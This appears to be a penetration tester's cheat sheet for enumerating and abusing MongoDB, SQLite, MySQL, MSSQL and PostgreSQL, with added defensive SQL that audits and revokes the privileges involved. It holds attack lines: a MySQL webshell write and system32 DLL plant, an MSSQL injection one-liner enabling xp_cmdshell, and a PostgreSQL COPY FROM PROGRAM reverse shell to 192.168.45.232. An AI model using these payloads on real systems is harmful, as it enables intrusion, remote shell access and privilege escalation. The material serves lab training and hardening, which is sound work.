Jackmeister's Playbook
SQL Database Uses

Mongo DB

mongo --host localhost --port 27017

show dbs;
use backup;
show collections;
// output in this example listed a single collection named "user"
db.user.find()

sqlite3

.tables
.schema table_name
SELECT * FROM table_name;
.exit

MySQL

show databases;
use database_name;
show tables;
select * from table_name;
# the mysql client's "system" command runs on the host where the mysql client runs, not on the database server
system whoami
select load_file('C:\\\\Users\\Administrator\\Desktop\\proof.txt');
select '<?php phpinfo() ?>' into outfile 'C:\\\\windows\\www\\webshell.php';
select load_file('C:\\\\programdata\\privesc\\phoneinfo.dll') into dumpfile 'C:\\\\Windows\\system32\\phoneinfo.dll';
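The load_file(), INTO OUTFILE and INTO DUMPFILE statements above only work when the server permits file access. An added MySQL check (not from the playbook) for the two controls that gate them; the account name in the REVOKE is a placeholder:

```sql
-- Added example (not from the playbook): what gates load_file() and SELECT ... INTO OUTFILE/DUMPFILE.
-- 1) secure_file_priv: '' = any path, NULL = file operations disabled, a directory = only under it.
--    It is read-only at runtime and is set under [mysqld] in my.cnf.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2) The FILE privilege is global (ON *.*); a web application's account should not hold it.
SELECT user, host, File_priv
FROM mysql.user
WHERE File_priv = 'Y';

-- Does the current connection hold it? Look for FILE or ALL PRIVILEGES in the output.
SHOW GRANTS FOR CURRENT_USER();

-- Remediation: revoke FILE from accounts that do not need it ('webapp'@'localhost' is a placeholder).
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
FLUSH PRIVILEGES;
```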
The next two lines are PostgreSQL, not MySQL: COPY ... FROM PROGRAM runs the quoted command as the database server's OS user and needs a superuser or a member of pg_execute_server_program.
DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'id';select * from cmd_exec;
DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.232 443 >/tmp/f';select * from cmd_exec;

MSSQL

Select version

SELECT @@version;

Show all databases

SELECT name FROM sys.databases;

master, tempdb, model, and msdb are default databases.

Selecting database and showing available tables

SELECT * FROM offsec.information_schema.tables;

Selecting table and showing all columns

select * from offsec.dbo.users;

Oneliner for Enabling xp_cmdshell and executing commands

';EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXECUTE xp_cmdshell 'whoami'--

';EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXECUTE xp_cmdshell 'timeout /t 5'--
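A defender-side check for the xp_cmdshell one-liner above, as an added T-SQL example that is not part of the original playbook: it reads the two settings the one-liner flips, lists which logins could flip them, and shows the disable sequence.

```sql
-- Added example (not from the playbook): audit the settings the one-liner above changes.
-- sys.configurations exposes every sp_configure option; value_in_use is the live value.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
-- value_in_use = 1 for xp_cmdshell means OS commands run as the SQL Server service account.

-- Who can run sp_configure at all: members of sysadmin, or any login holding ALTER SETTINGS.
SELECT name, type_desc
FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- Does the login the web application uses have that right? Run this as that login.
SELECT HAS_PERMS_BY_NAME(NULL, NULL, 'ALTER SETTINGS') AS can_reconfigure;
-- 1 means a stacked-query injection on this connection could enable xp_cmdshell as shown above;
-- 0 means the one-liner fails at the first sp_configure call.

-- Remediation: turn xp_cmdshell back off and re-hide the advanced options.
EXECUTE sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXECUTE sp_configure 'show advanced options', 0;
RECONFIGURE;
```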

Postgresql

psql -U postgres -h 10.4.216.215 -p 5432

-- list available databases
\l

-- connect to a database
\c confluence

-- select everything from the default user table
select * from cwd_user;

Reference : https://gist.github.com/Kartones/dd3ff5ec5ea238d4c546

Some interesting flags (to see all, use -h or --help depending on your psql version):

  • -E: will echo the underlying queries behind the \ commands (cool for learning!)

  • -l: psql will list all databases and then exit (useful if the user you connect with doesn't have a default database, like at AWS RDS)

Most \d commands support additional param of __schema__.name__ and accept wildcards like *.*

  • \?: Show help (list of available commands with an explanation)

  • \q: Quit/Exit

  • \c __database__: Connect to a database

  • \d __table__: Show table definition (columns, etc.) including triggers

  • \d+ __table__: More detailed table definition including description and physical disk size

  • \l: List databases

  • \dy: List event triggers

  • \df: List functions

  • \di: List indexes

  • \dn: List schemas

  • \dt *.*: List tables from all schemas (if *.* is omitted will only show SEARCH_PATH ones)

  • \dT+: List all data types

  • \dv: List views

  • \dx: List all extensions installed

  • \df+ __function__ : Show function SQL code.

  • \x: Pretty-format query results instead of the not-so-useful ASCII tables

  • \copy (SELECT * FROM __table_name__) TO 'file_path_and_name.csv' WITH CSV: Export a table as CSV

  • \des+: List all foreign servers

  • \dE[S+]: List all foreign tables

  • \! __bash_command__: execute __bash_command__ in a shell on the host where psql itself is running, not on the database server (e.g. \! ls)
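The COPY ... FROM PROGRAM statements earlier on this page are PostgreSQL features that run on the database server, unlike \! which only runs on the psql client. An added query (not from the playbook) that lists which roles can reach the server's OS or filesystem, plus the remediation for an over-privileged application role; the role name webapp is a placeholder:

```sql
-- Added example (not from the playbook). COPY ... FROM/TO PROGRAM runs a shell command as the
-- postgres OS user on the server. Superusers can do it, and since PostgreSQL 11 so can members
-- of the built-in role pg_execute_server_program; the two *_server_files roles gate COPY to/from files.
SELECT rolname,
       rolsuper,
       rolcanlogin,
       pg_has_role(oid, 'pg_execute_server_program', 'MEMBER') AS can_run_programs,
       pg_has_role(oid, 'pg_read_server_files',      'MEMBER') AS can_read_server_files,
       pg_has_role(oid, 'pg_write_server_files',     'MEMBER') AS can_write_server_files
FROM pg_roles
WHERE rolname NOT LIKE 'pg\_%'          -- skip the built-in pg_* roles themselves
  AND (rolsuper
       OR pg_has_role(oid, 'pg_execute_server_program', 'MEMBER')
       OR pg_has_role(oid, 'pg_read_server_files', 'MEMBER')
       OR pg_has_role(oid, 'pg_write_server_files', 'MEMBER'))
ORDER BY rolname;

-- The role the application connects as should not appear in that list. Checked from its own session:
SELECT current_user,
       (SELECT rolsuper FROM pg_roles WHERE rolname = current_user) AS is_superuser,
       pg_has_role(current_user, 'pg_execute_server_program', 'MEMBER') AS can_run_programs;

-- Remediation for an over-privileged application role ('webapp' is a placeholder name):
REVOKE pg_execute_server_program FROM webapp;
ALTER ROLE webapp NOSUPERUSER;
```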

Last updated 1 year ago